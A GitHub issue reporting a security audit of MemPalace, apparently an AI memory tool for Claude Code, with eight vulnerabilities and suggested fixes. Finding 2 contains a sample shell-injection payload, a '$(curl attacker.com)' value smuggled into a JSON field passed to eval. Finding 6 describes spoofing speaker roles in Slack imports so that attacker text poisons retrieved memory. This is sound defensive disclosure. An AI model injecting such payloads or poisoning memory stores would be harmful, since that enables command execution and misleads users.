Skip to content

Security Audit: 8 unreported vulnerabilities — data leakage, shell injection, file permissions #809

@Kesshite

Description

@Kesshite

Security Audit Report

Hi Milla, Ben, and the MemPalace community!

I ran a full security audit on the v3.2.0 codebase (commit 6614b9b, develop branch) before deploying MemPalace in my own workflow. I found 8 previously unreported vulnerabilities that I'd like to flag — and I'm happy to submit PRs for all of them.

I checked existing issues and PRs before filing this. #401 (security hardening RFC), #477 (search limit), #438 (precompact session_id + regex escape), and #782 (ChromaDB telemetry) cover some related ground but the findings below are not covered by any existing issue or PR.


CRITICAL

1. Wikipedia SSRF in entity_registry.py — violates local-first guarantee

File: mempalace/entity_registry.py, lines 176–257

_wikipedia_lookup() makes an outbound HTTPS GET to https://en.wikipedia.org/api/rest_v1/page/summary/{word} whenever research() is called. This is in the core package, not a benchmark or optional module.

  • Any entity name extracted during mining gets sent to Wikipedia
  • User's IP is disclosed to Wikipedia (and any network observer)
  • Directly violates CLAUDE.md: "Privacy by architecture — The system physically cannot send your data because it never leaves your machine"

Additionally, if Wikipedia returns 404, the word is classified as "person" with 0.70 confidence (lines 246–254), which poisons the entity registry with false positives.

Suggested fix: Make research() local-only by default. Require explicit allow_network=True opt-in for Wikipedia lookups, and return "unknown" with low confidence on 404 instead of asserting person.


2. Shell injection via eval in mempal_save_hook.shstop_hook_active not sanitized

File: hooks/mempal_save_hook.sh, lines 68–80

The save hook uses eval to parse Python output into shell variables. The stop_hook_active field is not passed through the safe() lambda (unlike session_id and transcript_path):

eval $(echo "$INPUT" | python3 -c "
...
safe = lambda s: re.sub(r'[^a-zA-Z0-9_/.\-~]', '', str(s))
print(f'SESSION_ID=\"{safe(sid)}\"')
print(f'STOP_HOOK_ACTIVE=\"{sha}\"')       # ← NOT sanitized
print(f'TRANSCRIPT_PATH=\"{safe(tp)}\"')
")

If the JSON input contains "stop_hook_active": "$(curl attacker.com)", bash will execute the command substitution inside eval.

Suggested fix: Validate stop_hook_active is strictly True or False before printing:

sha_raw = data.get('stop_hook_active', False)
sha = 'True' if sha_raw is True or str(sha_raw).lower() in ('true', '1') else 'False'

3. transcript_path from stdin opens arbitrary files in hooks_cli.py

File: mempalace/hooks_cli.py, lines 42–77, 124–126

transcript_path is read from the stdin JSON and passed to _count_human_messages() which calls Path(transcript_path).expanduser() and opens the file. No containment check ensures the path is within the expected Claude Code sessions directory.

Suggested fix: Validate the resolved path is under the expected root (e.g., ~/.claude/projects) and has a .jsonl/.json extension before opening.


HIGH

4. Arithmetic injection in mempal_save_hook.sh

File: hooks/mempal_save_hook.sh, lines 120–124

LAST_SAVE=$(cat "$LAST_SAVE_FILE")
SINCE_LAST=$((EXCHANGE_COUNT - LAST_SAVE))

LAST_SAVE is read from a state file and used directly in $((...)) without validating it's an integer. Bash arithmetic evaluates command substitutions.

Suggested fix:

if [[ "$LAST_SAVE_RAW" =~ ^[0-9]+$ ]]; then
    LAST_SAVE="$LAST_SAVE_RAW"
fi

MEDIUM

5. File permissions — 6 locations create sensitive files world-readable

On Linux with default umask (022), these files are created 644/755 (world-readable):

File What's exposed
hooks_cli.py:84~/.mempalace/hook_state/ Session IDs, timestamps
entity_registry.py:311entity_registry.json Names of all people, relationships, aliases
knowledge_graph.py:53knowledge_graph.sqlite3 Every temporal fact ever stored
exporter.py:51 — export output directory Complete verbatim memory palace
config.py:227people_map.json Name mappings for all people
mcp_server.py:92 — WAL file (TOCTOU race) Write audit log

Suggested fix: Apply chmod(0o700) to directories and chmod(0o600) to files immediately after creation, with try/except (OSError, NotImplementedError): pass for Windows compatibility.


6. Slack transcript role spoofing in normalize.py

File: mempalace/normalize.py, lines 276–306

The Slack JSON parser assigns "user" to the first speaker and "assistant" to the second, purely by position. A crafted Slack export where an attacker's message is first gets stored with role "user", making attacker-written text appear as the memory owner's own words in all future retrieval.

Suggested fix: Label Slack-sourced transcripts with a provenance header indicating multi-party chat origin, and don't assign user/assistant roles to arbitrary speakers.


7. palace_path from env var not normalized

File: mempalace/config.py, lines 143–148

MEMPALACE_PALACE_PATH from environment is used as-is, without os.path.abspath() or expanduser(). This differs from the --palace CLI arg (which gets abspath at mcp_server.py:62). A value with ../ components could redirect palace storage.

Suggested fix: Apply os.path.abspath(os.path.expanduser(env_val)) in the config loader.


8. Date fields in KG tools not validated

File: mempalace/mcp_server.py, line 748; knowledge_graph.py, lines 219–242

as_of, valid_from, valid_to parameters from MCP calls reach SQLite without format validation. While parameterized queries prevent SQL injection, invalid date strings silently break temporal filtering (queries return empty results instead of matching facts).

Suggested fix: Add an ISO-8601 date format validator at the MCP boundary:

_DATE_RE = re.compile(r'^\d{4}-(?:0[1-9]|1[0-2])(?:-(?:0[1-9]|[12]\d|3[01]))?$')

Relationship to existing issues/PRs

Next steps

I'm happy to submit focused PRs for each finding, targeting develop:

  • fix/security-wikipedia-ssrf — Finding 1
  • fix/security-hook-injection — Findings 2, 3, 4
  • fix/security-file-permissions — Finding 5
  • fix/security-normalize-roles — Finding 6
  • fix/security-config-validation — Findings 7, 8

Let me know if you'd prefer a different grouping or if any of these are already being worked on internally.

Thanks for building MemPalace — it's a great project and I want to help make it solid.

@Kesshite

Metadata

Metadata

Assignees

No one assigned

    Labels

    bugSomething isn't workingsecuritySecurity related

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions